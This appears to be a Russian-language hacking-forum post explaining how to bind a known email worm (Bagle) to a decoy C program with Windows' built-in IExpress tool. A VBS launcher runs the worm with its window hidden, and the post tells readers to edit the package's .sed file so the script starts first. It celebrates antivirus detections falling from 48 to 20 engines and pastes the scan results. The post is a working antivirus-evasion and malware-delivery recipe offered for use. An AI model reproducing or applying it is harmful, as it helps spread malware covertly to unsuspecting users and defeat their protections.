откопал тут старый способ)
на удивление метод легален и встроен в винду
берём какой-нить ехе, например, [Только зарегистрированные могут видеть это. ] (чистый, но вот вам на всякий случай [Только зарегистрированные могут видеть это. ])
степень 2 на си
з.ы. только откомпилил, а вт нашёл 5 из 52 XD
c код:
#include <iostream>
#include <windows.h>
using namespace std;
int main() {
__int64 a=1;
int n=64;
for (int i=1; i<n; i++)
{
a*=2;
cout << i << " " << a << "\n";
}
system ("pause");
}
[свернуть]
и какой-нить зловред, например, червячёк [Только зарегистрированные могут видеть это. ] ([Только зарегистрированные могут видеть это. ] (48 из 51))
перемещаем всё на рабочий стол
рядом создаём sbd.vbs:
vb код:
Set wshshell = WScript.CreateObject("WScript.Shell")
wshshell.run "2.exe", 1, False
wshshell.run "Win32.Bagle.CY.exe", 0, False
собсно наш скрипт просто запускает эти проги
wshshell.run имя_проги, отображать(1)_или_нет(0)_окно_ проги, ждать(True)_или_нет(False)_закрыт ия_перед_следующим_действи м
а теперь великая встроенная вещь по имени iexpress:
жмём Win+R, затем пишем iexpress
- далее
- далее
- любое название
- далее
- далее
- добавлием наши файлы для объединения в пакет (зловред, 2.ехе и vbs)
- выбираем прогу при старте, любую, лучше 2.ехе
- далее
- далее
- указываем рабочий стол для сохранения пакета
- галку на "не перезагружать"
- далее
- далее
должны появиться 2 файла
бла-бла.sed
бла-бла.exe
лезем в sed ищем
меняем наКод:AppLaunched=2.exe
(наш скрипт)Код:AppLaunched=sbd.vbs
снова
жмём Win+R, затем пишем iexpress
но теперь выбираем .sed, сразу после запуска
и пересоздаем пакет на основе нового sed
усё)
з.ы. [Только зарегистрированные могут видеть это. ] нового .exe... нам сбросили до 20 / 52
и я поражён рзультатами!!!
вэтэ кому лень
AVG I-Worm/Bagle 20140501 Ad-Aware [email protected] 20140501 Agnitum Trojan.DL.Bagle.EG 20140501 AntiVir TR/Bagle.DF 20140501 Antiy-AVL Trojan/Win32.Llac 20140501 Avast Win32:Beagle-EG [Wrm] 20140501 ClamAV Worm.Bagle.Gen-5 20140501 Commtouch W32/Mitglieder.WINF-4156 20140501 DrWeb Win32.HLLM.Beagle.35146 20140501 ESET-NOD32 Win32/Bagle.CY 20140501 F-Prot W32/Mitglieder.FT 20140501 F-Secure [email protected] 20140501 Ikarus Win32.Tupac.A 20140501 K7GW EmailWorm ( 00003b091 ) 20140501 Kaspersky Email-Worm.Win32.Bagle.pac 20140501 MicroWorld-eScan [email protected] 20140501 NANO-Antivirus Trojan.Win32.Agent.bobmol 20140501 Norman Heuristic_Suspicious.gen!r 20140501 Qihoo-360 Trojan.Generic 20140501 VIPRE Trojan.Win32.Generic.pak!cobra 20140501 AegisLab 20140501 AhnLab-V3 20140501 Baidu-International 20140501 BitDefender 20140501 Bkav 20140428 ByteHero 20140501 CAT-QuickHeal 20140430 CMC 20140429 Comodo 20140501 Emsisoft 20140501 Fortinet 20140430 GData 20140501 Jiangmin 20140501 K7AntiVirus 20140501 Kingsoft 20140501 Malwarebytes 20140501 McAfee
20140501 McAfee-GW-Edition
20140501 Microsoft
20140501 Panda
20140501 Rising 20140501 SUPERAntiSpyware 20140501 Sophos 20140501 Symantec 20140501 TheHacker 20140501 TotalDefense 20140501 TrendMicro 20140501 TrendMicro-HouseCall 20140501 VBA32 20140428 ViRobot 20140501 Zillya 20140501 nProtect 20140430 [свернуть]
з.з.ы. в этом sed очень много настроек, как и в самом iexpress
by [Только зарегистрированные могут видеть это. ], он же s0a